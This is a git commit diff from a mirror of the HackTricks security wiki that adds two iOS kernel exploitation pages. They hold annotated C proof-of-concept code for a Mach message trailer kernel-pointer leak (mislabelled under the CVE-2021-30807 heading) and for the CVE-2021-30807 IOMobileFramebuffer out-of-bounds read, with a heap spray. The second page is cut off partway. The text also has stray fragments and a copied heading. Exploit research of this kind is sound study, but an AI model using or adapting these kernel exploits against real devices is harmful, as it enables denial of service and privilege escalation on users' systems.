mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
f
This commit is contained in:
parent
a7cb57f773
commit
9c903a57ef
@ -766,7 +766,7 @@
|
||||
- [Stack Shellcode - arm64](binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md)
|
||||
- [Stack Pivoting - EBP2Ret - EBP chaining](binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md)
|
||||
- [Uninitialized Variables](binary-exploitation/stack-overflow/uninitialized-variables.md)
|
||||
- [ROP - Return Oriented Programing](binary-exploitation/rop-return-oriented-programing/README.md)
|
||||
- [ROP and JOP](binary-exploitation/rop-return-oriented-programing/README.md)
|
||||
- [BROP - Blind Return Oriented Programming](binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md)
|
||||
- [Ret2csu](binary-exploitation/rop-return-oriented-programing/ret2csu.md)
|
||||
- [Ret2dlresolve](binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md)
|
||||
@ -836,7 +836,7 @@
|
||||
- [WWW2Exec - \_\_malloc_hook & \_\_free_hook](binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md)
|
||||
- [Common Exploiting Problems](binary-exploitation/common-exploiting-problems.md)
|
||||
- [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
|
||||
- [iOS Exploiting](binary-exploitation/ios-exploiting.md)
|
||||
- [iOS Exploiting](binary-exploitation/ios-exploiting/README.md)
|
||||
|
||||
# 🤖 AI
|
||||
- [AI Security](AI/README.md)
|
||||
|
@ -0,0 +1,345 @@
|
||||
# CVE-2021-30807: IOMobileFrameBuffer OOB
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
## The Bug
|
||||
|
||||
You have a [great explanation of the vuln here](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak), but as summary:
|
||||
|
||||
Every Mach message the kernel receives ends with a **"trailer"**: a variable-length struct with metadata (seqno, sender token, audit token, context, access control data, labels...). The kernel **always reserves the largest possible trailer** (MAX_TRAILER_SIZE) in the message buffer, but **only initializes some fields**, then later **decides which trailer size to return** based on **user-controlled receive options**.
|
||||
|
||||
These are the trailer relevant structs:
|
||||
|
||||
```c
|
||||
typedef struct{
|
||||
mach_msg_trailer_type_t msgh_trailer_type;
|
||||
mach_msg_trailer_size_t msgh_trailer_size;
|
||||
} mach_msg_trailer_t;
|
||||
|
||||
typedef struct{
|
||||
mach_msg_trailer_type_t msgh_trailer_type;
|
||||
mach_msg_trailer_size_t msgh_trailer_size;
|
||||
mach_port_seqno_t msgh_seqno;
|
||||
security_token_t msgh_sender;
|
||||
audit_token_t msgh_audit;
|
||||
mach_port_context_t msgh_context;
|
||||
int msgh_ad;
|
||||
msg_labels_t msgh_labels;
|
||||
} mach_msg_mac_trailer_t;
|
||||
|
||||
#define MACH_MSG_TRAILER_MINIMUM_SIZE sizeof(mach_msg_trailer_t)
|
||||
typedef mach_msg_mac_trailer_t mach_msg_max_trailer_t;
|
||||
#define MAX_TRAILER_SIZE ((mach_msg_size_t)sizeof(mach_msg_max_trailer_t))
|
||||
```
|
||||
|
||||
Then, when the trailer object is generated, only some fields are initialized, an the max trailer size is always reserved:
|
||||
|
||||
```c
|
||||
trailer = (mach_msg_max_trailer_t *) ((vm_offset_t)kmsg->ikm_header + size);
|
||||
trailer->msgh_sender = current_thread()->task->sec_token;
|
||||
trailer->msgh_audit = current_thread()->task->audit_token;
|
||||
trailer->msgh_trailer_type = MACH_MSG_TRAILER_FORMAT_0;
|
||||
trailer->msgh_trailer_size = MACH_MSG_TRAILER_MINIMUM_SIZE;
|
||||
[...]
|
||||
trailer->msgh_labels.sender = 0;
|
||||
```
|
||||
|
||||
Then, for example, when trying to read a a mach message using `mach_msg()` the function `ipc_kmsg_add_trailer()` is called to append the trailer to the message. Inside this function the tailer size is calculated and some other trailer fields are filled:
|
||||
|
||||
```c
|
||||
if (!(option & MACH_RCV_TRAILER_MASK)) { [3]
|
||||
return trailer->msgh_trailer_size;
|
||||
}
|
||||
|
||||
trailer->msgh_seqno = seqno;
|
||||
trailer->msgh_context = context;
|
||||
trailer->msgh_trailer_size = REQUESTED_TRAILER_SIZE(thread_is_64bit_addr(thread), option);
|
||||
```
|
||||
|
||||
The `option` parameter is user-controlled, so **it's needed to pass a value that passes the `if` check.**
|
||||
|
||||
To pass this check we need to send a valid supported `option`:
|
||||
|
||||
```c
|
||||
#define MACH_RCV_TRAILER_NULL 0
|
||||
#define MACH_RCV_TRAILER_SEQNO 1
|
||||
#define MACH_RCV_TRAILER_SENDER 2
|
||||
#define MACH_RCV_TRAILER_AUDIT 3
|
||||
#define MACH_RCV_TRAILER_CTX 4
|
||||
#define MACH_RCV_TRAILER_AV 7
|
||||
#define MACH_RCV_TRAILER_LABELS 8
|
||||
|
||||
#define MACH_RCV_TRAILER_TYPE(x) (((x) & 0xf) << 28)
|
||||
#define MACH_RCV_TRAILER_ELEMENTS(x) (((x) & 0xf) << 24)
|
||||
#define MACH_RCV_TRAILER_MASK ((0xf << 24))
|
||||
```
|
||||
|
||||
But, becasaue the `MACH_RCV_TRAILER_MASK` is juts checking bits, we can pass any value between `0` and `8` to not enter inside the `if` statement.
|
||||
|
||||
Then, continuing with the code you can find:
|
||||
|
||||
```c
|
||||
if (GET_RCV_ELEMENTS(option) >= MACH_RCV_TRAILER_AV) {
|
||||
trailer->msgh_ad = 0;
|
||||
}
|
||||
|
||||
/*
|
||||
* The ipc_kmsg_t holds a reference to the label of a label
|
||||
* handle, not the port. We must get a reference to the port
|
||||
* and a send right to copyout to the receiver.
|
||||
*/
|
||||
|
||||
if (option & MACH_RCV_TRAILER_ELEMENTS(MACH_RCV_TRAILER_LABELS)) {
|
||||
trailer->msgh_labels.sender = 0;
|
||||
}
|
||||
|
||||
done:
|
||||
#ifdef __arm64__
|
||||
ipc_kmsg_munge_trailer(trailer, real_trailer_out, thread_is_64bit_addr(thread));
|
||||
#endif /* __arm64__ */
|
||||
|
||||
return trailer->msgh_trailer_size;
|
||||
```
|
||||
|
||||
Were you can see that if the `option` is bigger or equals to `MACH_RCV_TRAILER_AV` (7), the field **`msgh_ad`** is initialized to `0`.
|
||||
|
||||
If you noticed, **`msgh_ad`** was still the only field of the trailer that was not initialized before which could contain a leak from previously used memory.
|
||||
|
||||
So, the way avoid initializing it would be to pass an `option` value that is `5` or `6`, so it passes the first `if` check and doesn't enter the `if` that initializes `msgh_ad` because the values `5` and `6` don't have any trailer type associated.
|
||||
|
||||
### Basic PoC
|
||||
|
||||
Inside the [original post](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak), you have a PoC to just leak some random data.
|
||||
|
||||
### Leak Kernel Address PoC
|
||||
|
||||
The Inside the [original post](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak), you have a PoC to leak a kernel address. For this, a message full of `mach_msg_port_descriptor_t` structs is sent in the message cause the field `name` of this structure in userland contains an unsigned int but in kernel the `name` field is a struct `ipc_port` pointer in kernel. Thefore, sending tens of these structs in the message in kernel will mean to **add several kernel addresses inside the message** so one of them can be leaked.
|
||||
|
||||
Commetns were added for better understanding:
|
||||
|
||||
```c
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <mach/mach.h>
|
||||
|
||||
// Number of OOL port descriptors in the "big" message.
|
||||
// This layout aims to fit messages into kalloc.1024 (empirically good on impacted builds).
|
||||
#define LEAK_PORTS 50
|
||||
|
||||
// "Big" message: many descriptors → larger descriptor array in kmsg
|
||||
typedef struct {
|
||||
mach_msg_header_t header;
|
||||
mach_msg_body_t body;
|
||||
mach_msg_port_descriptor_t sent_ports[LEAK_PORTS];
|
||||
} message_big_t;
|
||||
|
||||
// "Small" message: fewer descriptors → leaves more room for the trailer
|
||||
// to overlap where descriptor pointers used to be in the reused kalloc chunk.
|
||||
typedef struct {
|
||||
mach_msg_header_t header;
|
||||
mach_msg_body_t body;
|
||||
mach_msg_port_descriptor_t sent_ports[LEAK_PORTS - 10];
|
||||
} message_small_t;
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
mach_port_t port; // our local receive port (target of sends)
|
||||
mach_port_t sent_port; // the port whose kernel address we want to leak
|
||||
|
||||
/*
|
||||
* 1) Create a receive right and attach a send right so we can send to ourselves.
|
||||
* This gives us predictable control over ipc_kmsg allocations when we send.
|
||||
*/
|
||||
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
|
||||
mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
|
||||
|
||||
/*
|
||||
* 2) Create another receive port (sent_port). We'll reference this port
|
||||
* in OOL descriptors so the kernel stores pointers to its ipc_port
|
||||
* structure in the kmsg → those pointers are what we aim to leak.
|
||||
*/
|
||||
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &sent_port);
|
||||
mach_port_insert_right(mach_task_self(), sent_port, sent_port, MACH_MSG_TYPE_MAKE_SEND);
|
||||
|
||||
printf("[*] Will get port %x address\n", sent_port);
|
||||
|
||||
message_big_t *big_message = NULL;
|
||||
message_small_t *small_message = NULL;
|
||||
|
||||
// Compute userland sizes of our message structs
|
||||
mach_msg_size_t big_size = (mach_msg_size_t)sizeof(*big_message);
|
||||
mach_msg_size_t small_size = (mach_msg_size_t)sizeof(*small_message);
|
||||
|
||||
// Allocate user buffers for the two send messages (+MAX_TRAILER_SIZE for safety/margin)
|
||||
big_message = malloc(big_size + MAX_TRAILER_SIZE);
|
||||
small_message = malloc(small_size + sizeof(uint32_t)*2 + MAX_TRAILER_SIZE);
|
||||
|
||||
/*
|
||||
* 3) Prepare the "big" message:
|
||||
* - Complex bit set (has descriptors)
|
||||
* - 50 OOL port descriptors, all pointing to the same sent_port
|
||||
* When you send a Mach message with port descriptors, the kernel “copy-ins” the userland port names (integers in your process’s IPC space) into an in-kernel ipc_kmsg_t, and resolves each name to the actual kernel object (an ipc_port).
|
||||
* Inside the kernel message, the header/descriptor area holds object pointers, not user names. On the way out (to the receiver), XNU “copy-outs” and converts those pointers back into names. This is explicitly documented in the copyout path: “the remote/local port fields contain port names instead of object pointers” (meaning they were pointers in-kernel).
|
||||
*/
|
||||
printf("[*] Creating first kalloc.1024 ipc_kmsg\n");
|
||||
memset(big_message, 0, big_size + MAX_TRAILER_SIZE);
|
||||
|
||||
big_message->header.msgh_remote_port = port; // send to our receive right
|
||||
big_message->header.msgh_size = big_size;
|
||||
big_message->header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0)
|
||||
| MACH_MSGH_BITS_COMPLEX;
|
||||
big_message->body.msgh_descriptor_count = LEAK_PORTS;
|
||||
|
||||
for (int i = 0; i < LEAK_PORTS; i++) {
|
||||
big_message->sent_ports[i].type = MACH_MSG_PORT_DESCRIPTOR;
|
||||
big_message->sent_ports[i].disposition = MACH_MSG_TYPE_COPY_SEND;
|
||||
big_message->sent_ports[i].name = sent_port; // repeated to fill array with pointers
|
||||
}
|
||||
|
||||
/*
|
||||
* 4) Prepare the "small" message:
|
||||
* - Fewer descriptors (LEAK_PORTS-10) so that, when the kalloc.1024 chunk is reused,
|
||||
* the trailer sits earlier and *overlaps* bytes where descriptor pointers lived.
|
||||
*/
|
||||
printf("[*] Creating second kalloc.1024 ipc_kmsg\n");
|
||||
memset(small_message, 0, small_size + sizeof(uint32_t)*2 + MAX_TRAILER_SIZE);
|
||||
|
||||
small_message->header.msgh_remote_port = port;
|
||||
small_message->header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0)
|
||||
| MACH_MSGH_BITS_COMPLEX;
|
||||
small_message->body.msgh_descriptor_count = LEAK_PORTS - 10;
|
||||
|
||||
for (int i = 0; i < LEAK_PORTS - 10; i++) {
|
||||
small_message->sent_ports[i].type = MACH_MSG_PORT_DESCRIPTOR;
|
||||
small_message->sent_ports[i].disposition = MACH_MSG_TYPE_COPY_SEND;
|
||||
small_message->sent_ports[i].name = sent_port;
|
||||
}
|
||||
|
||||
/*
|
||||
* 5) Receive buffer for reading back messages with trailers.
|
||||
* We'll request a *max-size* trailer via MACH_RCV_TRAILER_ELEMENTS(5).
|
||||
* On vulnerable kernels, field `msgh_ad` (in mac trailer) may be left uninitialized
|
||||
* if the requested elements value is < MACH_RCV_TRAILER_AV, causing stale bytes to leak.
|
||||
*/
|
||||
uint8_t *buffer = malloc(big_size + MAX_TRAILER_SIZE);
|
||||
mach_msg_mac_trailer_t *trailer; // interpret the tail as a "mac trailer" (format 0 / 64-bit variant internally)
|
||||
uintptr_t sent_port_address = 0; // we'll build the 64-bit pointer from two 4-byte leaks
|
||||
|
||||
/*
|
||||
* ---------- Exploitation sequence ----------
|
||||
*
|
||||
* Step A: Send the "big" message → allocate a kalloc.1024 ipc_kmsg that contains many
|
||||
* kernel pointers (ipc_port*) in its descriptor array.
|
||||
*/
|
||||
printf("[*] Sending message 1\n");
|
||||
mach_msg(&big_message->header,
|
||||
MACH_SEND_MSG,
|
||||
big_size, // send size
|
||||
0, // no receive
|
||||
MACH_PORT_NULL,
|
||||
MACH_MSG_TIMEOUT_NONE,
|
||||
MACH_PORT_NULL);
|
||||
|
||||
/*
|
||||
* Step B: Immediately receive/discard it with a zero-sized buffer.
|
||||
* This frees the kalloc chunk without copying descriptors back,
|
||||
* leaving the kernel pointers resident in freed memory (stale).
|
||||
*/
|
||||
printf("[*] Discarding message 1\n");
|
||||
mach_msg((mach_msg_header_t *)0,
|
||||
MACH_RCV_MSG, // try to receive
|
||||
0, // send size 0
|
||||
0, // recv size 0 (forces error/free path)
|
||||
port,
|
||||
MACH_MSG_TIMEOUT_NONE,
|
||||
MACH_PORT_NULL);
|
||||
|
||||
/*
|
||||
* Step C: Reuse the same size-class with the "small" message (fewer descriptors).
|
||||
* We slightly bump msgh_size by +4 so that when the kernel appends
|
||||
* the trailer, the trailer's uninitialized field `msgh_ad` overlaps
|
||||
* the low 4 bytes of a stale ipc_port* pointer from the prior message.
|
||||
*/
|
||||
small_message->header.msgh_size = small_size + sizeof(uint32_t); // +4 to shift overlap window
|
||||
printf("[*] Sending message 2\n");
|
||||
mach_msg(&small_message->header,
|
||||
MACH_SEND_MSG,
|
||||
small_size + sizeof(uint32_t),
|
||||
0,
|
||||
MACH_PORT_NULL,
|
||||
MACH_MSG_TIMEOUT_NONE,
|
||||
MACH_PORT_NULL);
|
||||
|
||||
/*
|
||||
* Step D: Receive message 2 and request an invalid trailer elements value (5).
|
||||
* - Bits 24..27 (MACH_RCV_TRAILER_MASK) are nonzero → the kernel computes a trailer.
|
||||
* - Elements=5 doesn't match any valid enum → REQUESTED_TRAILER_SIZE(...) falls back to max size.
|
||||
* - BUT init of certain fields (like `ad`) is guarded by >= MACH_RCV_TRAILER_AV (7),
|
||||
* so with 5, `msgh_ad` remains uninitialized → stale bytes leak.
|
||||
*/
|
||||
memset(buffer, 0, big_size + MAX_TRAILER_SIZE);
|
||||
printf("[*] Reading back message 2\n");
|
||||
mach_msg((mach_msg_header_t *)buffer,
|
||||
MACH_RCV_MSG | MACH_RCV_TRAILER_ELEMENTS(5), // core of CVE-2020-27950
|
||||
0,
|
||||
small_size + sizeof(uint32_t) + MAX_TRAILER_SIZE, // ensure room for max trailer
|
||||
port,
|
||||
MACH_MSG_TIMEOUT_NONE,
|
||||
MACH_PORT_NULL);
|
||||
|
||||
// Trailer begins right after the message body we sent (small_size + 4)
|
||||
trailer = (mach_msg_mac_trailer_t *)(buffer + small_size + sizeof(uint32_t));
|
||||
|
||||
// Leak low 32 bits from msgh_ad (stale data → expected to be the low dword of an ipc_port*)
|
||||
sent_port_address |= (uint32_t)trailer->msgh_ad;
|
||||
|
||||
/*
|
||||
* Step E: Repeat the A→D cycle but now shift by another +4 bytes.
|
||||
* This moves the overlap window so `msgh_ad` captures the high 4 bytes.
|
||||
*/
|
||||
printf("[*] Sending message 3\n");
|
||||
mach_msg(&big_message->header, MACH_SEND_MSG, big_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
|
||||
|
||||
printf("[*] Discarding message 3\n");
|
||||
mach_msg((mach_msg_header_t *)0, MACH_RCV_MSG, 0, 0, port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
|
||||
|
||||
// add another +4 to msgh_size → total +8 shift from the baseline
|
||||
small_message->header.msgh_size = small_size + sizeof(uint32_t)*2;
|
||||
printf("[*] Sending message 4\n");
|
||||
mach_msg(&small_message->header,
|
||||
MACH_SEND_MSG,
|
||||
small_size + sizeof(uint32_t)*2,
|
||||
0,
|
||||
MACH_PORT_NULL,
|
||||
MACH_MSG_TIMEOUT_NONE,
|
||||
MACH_PORT_NULL);
|
||||
|
||||
memset(buffer, 0, big_size + MAX_TRAILER_SIZE);
|
||||
printf("[*] Reading back message 4\n");
|
||||
mach_msg((mach_msg_header_t *)buffer,
|
||||
MACH_RCV_MSG | MACH_RCV_TRAILER_ELEMENTS(5),
|
||||
0,
|
||||
small_size + sizeof(uint32_t)*2 + MAX_TRAILER_SIZE,
|
||||
port,
|
||||
MACH_MSG_TIMEOUT_NONE,
|
||||
MACH_PORT_NULL);
|
||||
|
||||
trailer = (mach_msg_mac_trailer_t *)(buffer + small_size + sizeof(uint32_t)*2);
|
||||
|
||||
// Combine the high 32 bits, reconstructing the full 64-bit kernel pointer
|
||||
sent_port_address |= ((uintptr_t)trailer->msgh_ad) << 32;
|
||||
|
||||
printf("[+] Port %x has address %lX\n", sent_port, sent_port_address);
|
||||
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [Synacktiv's blog post](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak)
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
@ -0,0 +1,301 @@
|
||||
# CVE-2021-30807: IOMobileFrameBuffer OOB
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
## The Bug
|
||||
|
||||
You have a [great explanation of the vuln here](https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/), but as summary:
|
||||
|
||||
- The vulnerable code path is **external method #83** of the **IOMobileFramebuffer / AppleCLCD** user client: `IOMobileFramebufferUserClient::s_displayed_fb_surface(...)`. This method receives a parameter controlled by the user that is not check in any way and that passes to the next function as **`scalar0`**.
|
||||
|
||||
- That method forwards into **`IOMobileFramebufferLegacy::get_displayed_surface(this, task*, out_id, scalar0)`**, where **`scalar0`** (a user-controlled **32-bit** value) is used as an **index** into an internal **array of pointers** without **any bounds check**:
|
||||
|
||||
> `ptr = *(this + 0xA58 + scalar0 * 8);` → passed to `IOSurfaceRoot::copyPortNameForSurfaceInTask(...)` as an **`IOSurface*`**.\
|
||||
> **Result:** **OOB pointer read & type confusion** on that array. If the pointer isn't valid, the kernel deref panics → **DoS**.
|
||||
|
||||
> [!NOTE]
|
||||
> This was fixed in **iOS/iPadOS 14.7.1**, **macOS Big Sur 11.5.1**, **watchOS 7.6.1**
|
||||
|
||||
|
||||
> [!WARNING]
|
||||
> The initial function to call `IOMobileFramebufferUserClient::s_displayed_fb_surface(...)` is protected by the entitlement **`com.apple.private.allow-explicit-graphics-priority`**. However, **WebKit.WebContent** has this entitlement, so it can be used to trigger the vuln from a sandboxed process.
|
||||
|
||||
## DoS PoC
|
||||
|
||||
The following is the initial DoS PoC from the ooriginal blog post with extra comments:
|
||||
|
||||
```c
|
||||
// PoC for CVE-2021-30807 trigger (annotated)
|
||||
// NOTE: This demonstrates the crash trigger; it is NOT an LPE.
|
||||
// Build/run only on devices you own and that are vulnerable.
|
||||
// Patched in iOS/iPadOS 14.7.1, macOS 11.5.1, watchOS 7.6.1. (Apple advisory)
|
||||
// https://support.apple.com/en-us/103144
|
||||
// https://nvd.nist.gov/vuln/detail/CVE-2021-30807
|
||||
|
||||
void trigger_clcd_vuln(void) {
|
||||
kern_return_t ret;
|
||||
io_connect_t shared_user_client_conn = MACH_PORT_NULL;
|
||||
|
||||
// The "type" argument is the type (selector) of user client to open.
|
||||
// For IOMobileFramebuffer, 2 typically maps to a user client that exposes the
|
||||
// external methods we need (incl. selector 83). If this doesn't work on your
|
||||
// build, try different types or query IORegistry to enumerate.
|
||||
int type = 2;
|
||||
|
||||
// 1) Locate the IOMobileFramebuffer service in the IORegistry.
|
||||
// This returns the first matched service object (a kernel object handle).
|
||||
io_service_t service = IOServiceGetMatchingService(
|
||||
kIOMasterPortDefault,
|
||||
IOServiceMatching("IOMobileFramebuffer"));
|
||||
|
||||
if (service == MACH_PORT_NULL) {
|
||||
printf("failed to open service\n");
|
||||
return;
|
||||
}
|
||||
|
||||
printf("service: 0x%x\n", service);
|
||||
|
||||
// 2) Open a connection (user client) to the service.
|
||||
// The user client is what exposes external methods to userland.
|
||||
// 'type' selects which user client class/variant to instantiate.
|
||||
ret = IOServiceOpen(service, mach_task_self(), type, &shared_user_client_conn);
|
||||
if (ret != KERN_SUCCESS) {
|
||||
printf("failed to open userclient: %s\n", mach_error_string(ret));
|
||||
return;
|
||||
}
|
||||
|
||||
printf("client: 0x%x\n", shared_user_client_conn);
|
||||
|
||||
printf("call externalMethod\n");
|
||||
|
||||
// 3) Prepare input scalars for the external method call.
|
||||
// The vulnerable path uses a 32-bit scalar as an INDEX into an internal
|
||||
// array of pointers WITHOUT bounds checking (OOB read / type confusion).
|
||||
// We set it to a large value to force the out-of-bounds access.
|
||||
uint64_t scalars[4] = { 0x0 };
|
||||
scalars[0] = 0x41414141; // **Attacker-controlled index** → OOB pointer lookup
|
||||
|
||||
// 4) Prepare output buffers (the method returns a scalar, e.g. a surface ID).
|
||||
uint64_t output_scalars[4] = { 0 };
|
||||
uint32_t output_scalars_size = 1;
|
||||
|
||||
printf("call s_default_fb_surface\n");
|
||||
|
||||
// 5) Invoke external method #83.
|
||||
// On vulnerable builds, this path ends up calling:
|
||||
// IOMobileFramebufferUserClient::s_displayed_fb_surface(...)
|
||||
// → IOMobileFramebufferLegacy::get_displayed_surface(...)
|
||||
// which uses our index to read a pointer and then passes it as IOSurface*.
|
||||
// If the pointer is bogus, IOSurface code will dereference it and the kernel
|
||||
// will panic (DoS).
|
||||
ret = IOConnectCallMethod(
|
||||
shared_user_client_conn,
|
||||
83, // **Selector 83**: vulnerable external method
|
||||
scalars, 1, // input scalars (count = 1; the OOB index)
|
||||
NULL, 0, // no input struct
|
||||
output_scalars, &output_scalars_size, // optional outputs
|
||||
NULL, NULL); // no output struct
|
||||
|
||||
// 6) Check the call result. On many vulnerable targets, you'll see either
|
||||
// KERN_SUCCESS right before a panic (because the deref happens deeper),
|
||||
// or an error if the call path rejects the request (e.g., entitlement/type).
|
||||
if (ret != KERN_SUCCESS) {
|
||||
printf("failed to call external method: 0x%x --> %s\n",
|
||||
ret, mach_error_string(ret));
|
||||
return;
|
||||
}
|
||||
|
||||
printf("external method returned KERN_SUCCESS\n");
|
||||
|
||||
// 7) Clean up the user client connection handle.
|
||||
IOServiceClose(shared_user_client_conn);
|
||||
printf("success!\n");
|
||||
}
|
||||
```
|
||||
|
||||
## Arbitrary Read PoC Explained
|
||||
|
||||
1. **Opening the right user client**
|
||||
|
||||
- `get_appleclcd_uc()` finds the **AppleCLCD** service and opens **user client type 2**. AppleCLCD and IOMobileFramebuffer share the same external-methods table; type 2 exposes **selector 83**, the vulnerable method. **This is your entry to the bug.** E_POC/)
|
||||
|
||||
**Why 83 matters:** the decompiled path is:
|
||||
|
||||
- `IOMobileFramebufferUserClient::s_displayed_fb_surface(...)`\
|
||||
→ `IOMobileFramebufferUserClient::get_displayed_surface(...)`\
|
||||
→ `IOMobileFramebufferLegacy::get_displayed_surface(...)`\
|
||||
Inside that last call, the code **uses your 32-bit scalar as an array index with no bounds check**, fetches a pointer from **`this + 0xA58 + index*8`**, and **passes it as an `IOSurface*`** to `IOSurfaceRoot::copyPortNameForSurfaceInTask(...)`. **That's the OOB + type confusion.**
|
||||
|
||||
2. **The heap spray (why IOSurface shows up here)**
|
||||
|
||||
- `do_spray()` uses **`IOSurfaceRootUserClient`** to **create many IOSurfaces** and **spray small values** (`s_set_value` style). This fills nearby kernel heaps with **pointers to valid IOSurface objects**.
|
||||
|
||||
- **Goal:** when selector 83 reads past the legit table, the **OOB slot likely contains a pointer to one of your (real) IOSurfaces**---so the later dereference **doesn't crash** and **succeeds**. IOSurface is a classic, well-documented kernel spray primitive, and Saar's post explicitly lists the **create / set_value / lookup** methods used for this exploitation flow.
|
||||
|
||||
3. **The "offset/8" trick (what that index really is)**
|
||||
|
||||
- In `trigger_oob(offset)`, you set `scalars[0] = offset / 8`.
|
||||
|
||||
- **Why divide by 8?** The kernel does **`base + index*8`** to compute which **pointer-sized slot** to read. You're picking **"slot number N"**, not a byte offset. **Eight bytes per slot** on 64-bit.
|
||||
|
||||
- That computed address is **`this + 0xA58 + index*8`**. The PoC uses a big constant (`0x1200000 + 0x1048`) simply to step **far out of bounds** into a region you've tried to **densely populate with IOSurface pointers**. **If the spray "wins," the slot you hit is a valid `IOSurface*`.**
|
||||
|
||||
4. **What selector 83 returns (this is the subtle part)**
|
||||
|
||||
- The call is:
|
||||
|
||||
`IOConnectCallMethod(appleclcd_uc, 83, scalars, 1, NULL, 0,
|
||||
output_scalars, &output_scalars_size, NULL, NULL);`o
|
||||
|
||||
- Internally, after the OOB pointer fetch, the driver calls\
|
||||
**`IOSurfaceRoot::copyPortNameForSurfaceInTask(task, IOSurface*, out_u32*)`**.
|
||||
|
||||
- **Result:** **`output_scalars[0]` is a Mach port name (u32 handle) in your task** for *whatever object pointer you supplied via OOB*. **It is not a raw kernel address leak; it's a userspace handle (send right).** This exact behavior (copying a *port name*) is shown in Saar's decompilation.
|
||||
|
||||
**Why that's useful:** with a **port name** to the (supposed) IOSurface, you can now use **IOSurfaceRoot methods** like:
|
||||
|
||||
- **`s_lookup_surface_from_port` (method 34)** → turn the port into a **surface ID** you can operate on through other IOSurface calls, and
|
||||
|
||||
- **`s_create_port_from_surface` (method 35)** if you need the inverse.\
|
||||
Saar calls out these exact methods as the next step. **The PoC is proving you can "manufacture" a legitimate IOSurface handle from an OOB slot.** [Saaramar](https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/?utm_source=chatgpt.com)
|
||||
|
||||
This [PoC was taken from here](https://github.com/saaramar/IOMobileFrameBuffer_LPE_POC/blob/main/poc/exploit.c) and added some comments to explain the steps:
|
||||
|
||||
```c
|
||||
#include "exploit.h"
|
||||
|
||||
// Open the AppleCLCD (aka IOMFB) user client so we can call external methods.
|
||||
io_connect_t get_appleclcd_uc(void) {
|
||||
kern_return_t ret;
|
||||
io_connect_t shared_user_client_conn = MACH_PORT_NULL;
|
||||
int type = 2; // **UserClient type**: variant that exposes selector 83 on affected builds. ⭐
|
||||
// (AppleCLCD and IOMobileFramebuffer share the same external methods table.)
|
||||
|
||||
// Find the **AppleCLCD** service in the IORegistry.
|
||||
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
|
||||
IOServiceMatching("AppleCLCD"));
|
||||
if(service == MACH_PORT_NULL) {
|
||||
printf("[-] failed to open service\n");
|
||||
return MACH_PORT_NULL;
|
||||
}
|
||||
printf("[*] AppleCLCD service: 0x%x\n", service);
|
||||
|
||||
// Open a user client connection to AppleCLCD with the chosen **type**.
|
||||
ret = IOServiceOpen(service, mach_task_self(), type, &shared_user_client_conn);
|
||||
if(ret != KERN_SUCCESS) {
|
||||
printf("[-] failed to open userclient: %s\n", mach_error_string(ret));
|
||||
return MACH_PORT_NULL;
|
||||
}
|
||||
printf("[*] AppleCLCD userclient: 0x%x\n", shared_user_client_conn);
|
||||
return shared_user_client_conn;
|
||||
}
|
||||
|
||||
// Trigger the OOB index path of external method #83.
|
||||
// The 'offset' you pass is in bytes; dividing by 8 converts it to the
|
||||
// index of an 8-byte pointer slot in the internal table at (this + 0xA58).
|
||||
uint64_t trigger_oob(uint64_t offset) {
|
||||
kern_return_t ret;
|
||||
|
||||
// The method takes a single 32-bit scalar that it uses as an index.
|
||||
uint64_t scalars[1] = { 0x0 };
|
||||
scalars[0] = offset / 8; // **index = byteOffset / sizeof(void*)**. ⭐
|
||||
|
||||
// #83 returns one scalar. In this flow it will be the Mach port name
|
||||
// (a u32 handle in our task), not a kernel pointer.
|
||||
uint64_t output_scalars[1] = { 0 };
|
||||
uint32_t output_scalars_size = 1;
|
||||
|
||||
io_connect_t appleclcd_uc = get_appleclcd_uc();
|
||||
if (appleclcd_uc == MACH_PORT_NULL) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
// Call external method 83. Internally:
|
||||
// ptr = *(this + 0xA58 + index*8); // OOB pointer fetch
|
||||
// IOSurfaceRoot::copyPortNameForSurfaceInTask(task, (IOSurface*)ptr, &out)
|
||||
// which creates a send right for that object and writes its port name
|
||||
// into output_scalars[0]. If ptr is junk → deref/panic (DoS).
|
||||
ret = IOConnectCallMethod(appleclcd_uc, 83,
|
||||
scalars, 1,
|
||||
NULL, 0,
|
||||
output_scalars, &output_scalars_size,
|
||||
NULL, NULL);
|
||||
|
||||
if (ret != KERN_SUCCESS) {
|
||||
printf("[-] external method 83 failed: %s\n", mach_error_string(ret));
|
||||
return 0;
|
||||
}
|
||||
|
||||
// This is the key: you get back a Mach port name (u32) to whatever
|
||||
